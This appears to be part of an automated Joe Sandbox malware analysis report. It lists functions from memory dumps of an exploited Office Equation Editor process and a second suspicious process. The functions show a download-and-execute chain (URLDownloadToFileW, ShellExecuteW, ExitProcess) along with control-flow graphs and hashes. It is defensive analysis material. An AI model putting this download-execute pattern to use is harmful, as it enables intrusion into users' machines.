                                                control_flow_graph 91 35f05c4-35f05cf 93 35f05d5-35f0643 URLDownloadToFileW call 35f0636 call 35f064b 91->93 94 35f05d0 call 35f061d 91->94 102 35f06aa-35f06b6 93->102 103 35f0645-35f0667 ShellExecuteW call 35f0670 93->103 94->93 105 35f06b9 102->105 103->105 113 35f0669 103->113 107 35f06bb-35f06bf 105->107 108 35f06c1-35f06c5 105->108 107->108 110 35f06cd-35f06d4 107->110 111 35f06da-35f06dc 108->111 112 35f06c7-35f06cb 108->112 114 35f06d8 110->114 115 35f06d6 110->115 116 35f06ec-35f06ed 111->116 112->110 112->111 113->111 117 35f066b-35f0675 ExitProcess 113->117 118 35f06de-35f06e7 114->118 115->111 121 35f06e9 118->121 122 35f06b0-35f06b3 118->122 121->116 122->118 123 35f06b5 122->123 123->105
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_35f0000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteExitFileProcessShell
                                                • String ID: rocess
                                                • API String ID: 3584569557-1188804192
                                                • Opcode ID: 9929218464ce9ff4948c20d1499f0ceada9108c6421f481cff17077da83e0879
                                                • Instruction ID: 7e0fb9ea47ad1f858afaec17d17665457984dd805c4d18bc422ac0457db126a0
                                                • Opcode Fuzzy Hash: 9929218464ce9ff4948c20d1499f0ceada9108c6421f481cff17077da83e0879
                                                • Instruction Fuzzy Hash: 8121589294D3C62FEB1397701C6EB55BF602FA7500F5C89CFA2C64E4E3E6988441C796
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 035F061D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37filenetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 125 35f061d-35f061f URLDownloadToFileW 126 35f0626-35f0643 call 35f064b 125->126 127 35f0621 call 35f0636 125->127 131 35f06aa-35f06b6 126->131 132 35f0645-35f0667 ShellExecuteW call 35f0670 126->132 127->126 134 35f06b9 131->134 132->134 142 35f0669 132->142 136 35f06bb-35f06bf 134->136 137 35f06c1-35f06c5 134->137 136->137 139 35f06cd-35f06d4 136->139 140 35f06da-35f06dc 137->140 141 35f06c7-35f06cb 137->141 143 35f06d8 139->143 144 35f06d6 139->144 145 35f06ec-35f06ed 140->145 141->139 141->140 142->140 146 35f066b-35f0675 ExitProcess 142->146 147 35f06de-35f06e7 143->147 144->140 150 35f06e9 147->150 151 35f06b0-35f06b3 147->151 150->145 151->147 152 35f06b5 151->152 152->134
                                                APIs
                                                • URLDownloadToFileW.URLMON(00000000,035F05D5,?,00000000,00000000), ref: 035F061F
                                                  • Part of subcall function 035F0636: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F065D
                                                  • Part of subcall function 035F0636: ExitProcess.KERNEL32(00000000), ref: 035F0675
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_35f0000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteExitFileProcessShell
                                                • String ID: rocess
                                                • API String ID: 3584569557-1188804192
                                                • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                • Instruction ID: d224cb203c5cfe5fd08d847e21b6b5225b8bd4b5e6063a2882983464c46807c1
                                                • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                • Instruction Fuzzy Hash: 74F0E2A058D3416DF612EB742C5EF6A6E64BFC1700F1C0889B3429F0F3D984880082A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 035F064B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 154 35f064b-35f065d ShellExecuteW 156 35f0664-35f0667 154->156 157 35f065f call 35f0670 154->157 159 35f06b9 156->159 160 35f0669 156->160 157->156 161 35f06bb-35f06bf 159->161 162 35f06c1-35f06c5 159->162 163 35f066b-35f0675 ExitProcess 160->163 164 35f06da-35f06dc 160->164 161->162 165 35f06cd-35f06d4 161->165 162->164 167 35f06c7-35f06cb 162->167 168 35f06ec-35f06ed 164->168 169 35f06d8 165->169 170 35f06d6 165->170 167->164 167->165 172 35f06de-35f06e7 169->172 170->164 174 35f06e9 172->174 175 35f06b0-35f06b3 172->175 174->168 175->172 176 35f06b5 175->176 176->159
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F065D
                                                  • Part of subcall function 035F0670: ExitProcess.KERNEL32(00000000), ref: 035F0675
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_35f0000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExecuteExitProcessShell
                                                • String ID: rocess
                                                • API String ID: 1124553745-1188804192
                                                • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                • Instruction ID: 70e491b7ddd99aa4f15555ab64c84f8655de4beb2a9ed13af5f46d9732a9d37b
                                                • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                • Instruction Fuzzy Hash: CF012BA45493526EEB30F6646C057B5E611BBD1711FCC8C46AB81170FBD59490C386ED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 035F0636 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 177 35f0636-35f0638 179 35f063d-35f0643 177->179 180 35f0638 call 35f064b 177->180 181 35f06aa-35f06b6 179->181 182 35f0645-35f0667 ShellExecuteW call 35f0670 179->182 180->179 184 35f06b9 181->184 182->184 192 35f0669 182->192 186 35f06bb-35f06bf 184->186 187 35f06c1-35f06c5 184->187 186->187 189 35f06cd-35f06d4 186->189 190 35f06da-35f06dc 187->190 191 35f06c7-35f06cb 187->191 193 35f06d8 189->193 194 35f06d6 189->194 195 35f06ec-35f06ed 190->195 191->189 191->190 192->190 196 35f066b-35f0675 ExitProcess 192->196 197 35f06de-35f06e7 193->197 194->190 200 35f06e9 197->200 201 35f06b0-35f06b3 197->201 200->195 201->197 202 35f06b5 201->202 202->184
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_35f0000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExecuteExitProcessShell
                                                • String ID: rocess
                                                • API String ID: 1124553745-1188804192
                                                • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                • Instruction ID: 8bedbeac5adfee64ee93db043e74120da436785f3ba478b87a5f9fcd4ed4ab12
                                                • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                • Instruction Fuzzy Hash: 3301497454D3427EF370F6246C48BAAEA84BBC1710F9C885AE3915B0FBC6C4448386AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 035F0670 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 204 35f0670-35f0675 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(00000000), ref: 035F0675
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_35f0000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 035F0677 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 206 35f0677-35f0682 GetPEB 207 35f0685-35f0696 call 35f069f 206->207 210 35f0698-35f069c 207->210
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_35f0000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                • Instruction ID: 38c82c00bcf3d74f8538b8dd03ab0af6e8ef8994bc50815b503eb0d80972cfe3
                                                • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                • Instruction Fuzzy Hash: CFD092753125029FDB05DF04DA80E57F3BAFFD8611B28C268E6044BA6AD730E892CAD4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 000007FE88C67565 Relevance: 1.9, Strings: 1, Instructions: 699COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SYft
                                                • API String ID: 0-4284355435
                                                • Opcode ID: e6c3ee42341be4990f939375300b303dac5bfad5d5cbb601391ab16556bed4d6
                                                • Instruction ID: 5d6385b834da7f0153204cf1dcbc5ffd89df11989180e4107e0f4d141bebaa04
                                                • Opcode Fuzzy Hash: e6c3ee42341be4990f939375300b303dac5bfad5d5cbb601391ab16556bed4d6
                                                • Instruction Fuzzy Hash: BB525B70E1461D8FDB18DFA8C890AEDBBF2FF98310F148669E419E7359D634A981CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C6062D Relevance: 1.9, Strings: 1, Instructions: 674COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 7w(
                                                • API String ID: 0-1605416360
                                                • Opcode ID: ce5aa5625be765220cad6247cb8442322abbee4aaa2f3b0e59237c624280221c
                                                • Instruction ID: 53f21a77659f5a4a996659d8e3892520f8eaf90b83e8d807b5305f6be57d126a
                                                • Opcode Fuzzy Hash: ce5aa5625be765220cad6247cb8442322abbee4aaa2f3b0e59237c624280221c
                                                • Instruction Fuzzy Hash: E8E14C30D1865D8FEB99EB68D8517ECB7F1FB58300F5040AAD44DF72A6DA356A80CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C60660 Relevance: 1.9, Strings: 1, Instructions: 654COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 7w(
                                                • API String ID: 0-1605416360
                                                • Opcode ID: 021a0ef791092678f0ac363f7245fc05d2ab23e18b533b5e0a922610b2689d7e
                                                • Instruction ID: 755fda5f13d3d3e8f55421be32a0ec7e49ca4498756b16219851a1c45a04d722
                                                • Opcode Fuzzy Hash: 021a0ef791092678f0ac363f7245fc05d2ab23e18b533b5e0a922610b2689d7e
                                                • Instruction Fuzzy Hash: 4CD15D30D1865D8FDB99EB68D855BECB7F1FB58300F5040AED00DE72A2DA356A80CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C60698 Relevance: 1.9, Strings: 1, Instructions: 630COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 7w(
                                                • API String ID: 0-1605416360
                                                • Opcode ID: 4f727c66568ca8ab2214ff6a3e096d73da695f01ec50f8c262c64ed26d31006d
                                                • Instruction ID: 4fcd159919b1389424320707d42d891b74717c16ba07d0b2a58ea6cc1dd1f95a
                                                • Opcode Fuzzy Hash: 4f727c66568ca8ab2214ff6a3e096d73da695f01ec50f8c262c64ed26d31006d
                                                • Instruction Fuzzy Hash: 5FC12C3091865D8FDB99EB68D855BEDB7F1FB58300F5041AED40EE32A6DA346A80CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C606A0 Relevance: 1.9, Strings: 1, Instructions: 626COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 7w(
                                                • API String ID: 0-1605416360
                                                • Opcode ID: f1bbaa7b0ddebd05e101e1ccd4fb789656e6b33a0a3b097afa7aacd6e0e1867f
                                                • Instruction ID: 0dd0eed5462c06bc8b4f97d0e7b825ce6535aa7857640c85804f18f2bdeea52c
                                                • Opcode Fuzzy Hash: f1bbaa7b0ddebd05e101e1ccd4fb789656e6b33a0a3b097afa7aacd6e0e1867f
                                                • Instruction Fuzzy Hash: D5C12C3091865D8FDB99EB68D855BEDB7F1FB58300F5041AED40EE32A6DA346A80CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C606A8 Relevance: 1.9, Strings: 1, Instructions: 623COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 7w(
                                                • API String ID: 0-1605416360
                                                • Opcode ID: 54dd353f5efdc4280c50356f28a20312b7fa1502db8ec4c4b75debf292a6c36c
                                                • Instruction ID: 9bc647deb9d4cf7c8a01ce05370d9413ff794c0eb711290a013b7a6241678e59
                                                • Opcode Fuzzy Hash: 54dd353f5efdc4280c50356f28a20312b7fa1502db8ec4c4b75debf292a6c36c
                                                • Instruction Fuzzy Hash: 06C12C3091865D8FDB99EB68D855BEDB7F1FB58300F5041AED50EF32A6DA346A80CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C606B0 Relevance: 1.9, Strings: 1, Instructions: 617COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 7w(
                                                • API String ID: 0-1605416360
                                                • Opcode ID: c82bb9a4628b26b5f2f3cb16e4d85dab0220ba2c5a55780a5dd72125115c79b4
                                                • Instruction ID: 73aca81eca9c7fbd2b77981be000eb0853cd207c6e4ec3e79fd927edcf439e2c
                                                • Opcode Fuzzy Hash: c82bb9a4628b26b5f2f3cb16e4d85dab0220ba2c5a55780a5dd72125115c79b4
                                                • Instruction Fuzzy Hash: 9FC11C3091865D8FDB99EB68D855BEDB7F1FB58300F5041AED40EF32A6DA346A80CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C67D19 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \zf>
                                                • API String ID: 0-188699402
                                                • Opcode ID: 490b73497db27be26d880f810b97e8d94daef7c1a23486a2467200cf3a2a6177
                                                • Instruction ID: f00dcfc5fe09b4b6728e1b22829f7686a745bcaaa330f8662fa7f931ee31aad1
                                                • Opcode Fuzzy Hash: 490b73497db27be26d880f810b97e8d94daef7c1a23486a2467200cf3a2a6177
                                                • Instruction Fuzzy Hash: 61512B7091861D8FDB98EBA9C4517EDBBF1FF59341F4001AED40EE7296CA3469408B02
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C6058A Relevance: 8.8, Strings: 7, Instructions: 88COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: a_^N$a_^X$a_^Z$a_^h$a_^j$a_^l$a_^n
                                                • API String ID: 0-568521261
                                                • Opcode ID: 7b8316994abc5d1d54fab33f24c3c7ab4428c2b9110a9debab52a9d104fb77be
                                                • Instruction ID: 3f24ead96dab0de53e757c48bc93be7e80769ad2546a4ed3760b746271c601c7
                                                • Opcode Fuzzy Hash: 7b8316994abc5d1d54fab33f24c3c7ab4428c2b9110a9debab52a9d104fb77be
                                                • Instruction Fuzzy Hash: 4D21FB73C185699FE700FB78B845BED77A4FB44364F18083AE46DDA062D569A288C7C2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C60D2A Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: hV@$x2>
                                                • API String ID: 0-568864760
                                                • Opcode ID: 2e79396e8792d91a8602e898b55cf128583c4f6f8372364037df186097b9d88b
                                                • Instruction ID: e13abe91cf6261d0844b158e0c9cfd0b8215a8a7d1718ab7a8acd5c23c3d457f
                                                • Opcode Fuzzy Hash: 2e79396e8792d91a8602e898b55cf128583c4f6f8372364037df186097b9d88b
                                                • Instruction Fuzzy Hash: 75B1A23091868D4FE786EB2CD8547A9BFF2FF9E305F9140AAD04DE72A2CA355915CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C6D117 Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ?$r
                                                • API String ID: 0-2677377545
                                                • Opcode ID: ba39912221b0f3f0bddd452c359110bf12d785958a5aa2aadedf99c110dd2ae1
                                                • Instruction ID: 74ce052c20d91f75b9b25970056da4acb939402db9079605727dc1d1c2532687
                                                • Opcode Fuzzy Hash: ba39912221b0f3f0bddd452c359110bf12d785958a5aa2aadedf99c110dd2ae1
                                                • Instruction Fuzzy Hash: 04111930D19A5A8FDFE1EB18C884BA9B3B1FB14711F1051E9940CD3295DA34AF85CF42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C6F9FB Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `"2M
                                                • API String ID: 0-3300316109
                                                • Opcode ID: 2d9b75d5bd72b9c478f62dddc62296db532675256ddd5490ae2bdbbd20aeb1bc
                                                • Instruction ID: 9109df7c11127ba18d7eed454d35f6d56409e195bc77992456ecde7224184902
                                                • Opcode Fuzzy Hash: 2d9b75d5bd72b9c478f62dddc62296db532675256ddd5490ae2bdbbd20aeb1bc
                                                • Instruction Fuzzy Hash: 0102D774E14A5E8FEB98EF68D8547EDB7F1FB58301F5040AD940DE32A5DA386A818F00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C6278D Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: P
                                                • API String ID: 0-3110715001
                                                • Opcode ID: 04bfc156ec6e8f2c2b32b7f2b60859efc226264f1514e6b92d11e2fb32690c6b
                                                • Instruction ID: c21dacf0904973da5587e69e43fa7daf61badc5ff3ad8dcfb185ccf8ab8f1d59
                                                • Opcode Fuzzy Hash: 04bfc156ec6e8f2c2b32b7f2b60859efc226264f1514e6b92d11e2fb32690c6b
                                                • Instruction Fuzzy Hash: DF311E70D19A5D8FEBA4EB28C884BA9B7F1FB55301F1011A9D40DE31A5DA74AB808F42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C61140 Relevance: .3, Instructions: 322COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c46cee886c1d51ec95b449fc8cc98414b6dec308c7b28592612a0956c1b6bcf
                                                • Instruction ID: 8848c58887effd2cfc59cd417087ad79a1cfd0d5ac4c0ab4e031f36aa5d244ab
                                                • Opcode Fuzzy Hash: 8c46cee886c1d51ec95b449fc8cc98414b6dec308c7b28592612a0956c1b6bcf
                                                • Instruction Fuzzy Hash: 27C12C70A1864D8FDB94EF68D490BADB7F2FF99301F5040A9D01EE72A6DA34AD41CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C69270 Relevance: .3, Instructions: 322COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 905a4ac84564d2b9da863c9669b895b42324f27df8ffc4842ec61197560eb9e6
                                                • Instruction ID: 94882fbc4ff06963d023e038205d54d7246e5f2a2cafa4fbe5e135b3bf9684e8
                                                • Opcode Fuzzy Hash: 905a4ac84564d2b9da863c9669b895b42324f27df8ffc4842ec61197560eb9e6
                                                • Instruction Fuzzy Hash: 43C12D70A1861D8FDB94EF68D490BADBBF2FF99304F5041A9D00DE72A6DA34AD41CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C60350 Relevance: .3, Instructions: 288COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c611f21e96eb063818f57d1adb6e8136f8b3674f6f87284f470e6a6de24f997
                                                • Instruction ID: a426878f7a9a3b5188aa77160a3059b6f85af95e5dddb53c0dfab8b9d6d30a6c
                                                • Opcode Fuzzy Hash: 2c611f21e96eb063818f57d1adb6e8136f8b3674f6f87284f470e6a6de24f997
                                                • Instruction Fuzzy Hash: 60B1D770908A5D8FDFA8EF58D894BA9B7F1FB59301F5040AED40EE72A5DB349981CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C60382 Relevance: .3, Instructions: 274COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13ae8f162ce26214971c56f25a4181b715d95a95bdf53081072a5e52c3d110b5
                                                • Instruction ID: 79df11212b927da7ef7acdb702c4fc57852ac4bf0feab64984c2ea660ae04ce1
                                                • Opcode Fuzzy Hash: 13ae8f162ce26214971c56f25a4181b715d95a95bdf53081072a5e52c3d110b5
                                                • Instruction Fuzzy Hash: 0C818E3090D6998FDB55EF68D8507E9BBB1FF5A300F1400AED04EE72A2DA349984CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C60528 Relevance: .2, Instructions: 230COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53be4744ab40d57815728cfb1b5e7c8801200cf06cc8698a6df9db8bc4313602
                                                • Instruction ID: abd59d5a46ea0eb841f809c6403858514c0900ce09424f97a0b5030b76e07be0
                                                • Opcode Fuzzy Hash: 53be4744ab40d57815728cfb1b5e7c8801200cf06cc8698a6df9db8bc4313602
                                                • Instruction Fuzzy Hash: 31912C30A1855D8FDB94EF68D490BADB7F2FF99301F5040A9D00DE72A2DA34AE85CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C602F0 Relevance: .2, Instructions: 211COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 89f426113a057a495c30e850f3b5b351bfd9204ce1c36c0476dd2d20c0db4c97
                                                • Instruction ID: 7004a25ae47dcef176d1e89df4ac168b6a364f6a399c21bd96d6ece058765159
                                                • Opcode Fuzzy Hash: 89f426113a057a495c30e850f3b5b351bfd9204ce1c36c0476dd2d20c0db4c97
                                                • Instruction Fuzzy Hash: 0F612B3090865D8FDBA4EF69D454BEDBBB1FF59301F1000AEE44EE72A2DA349981CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

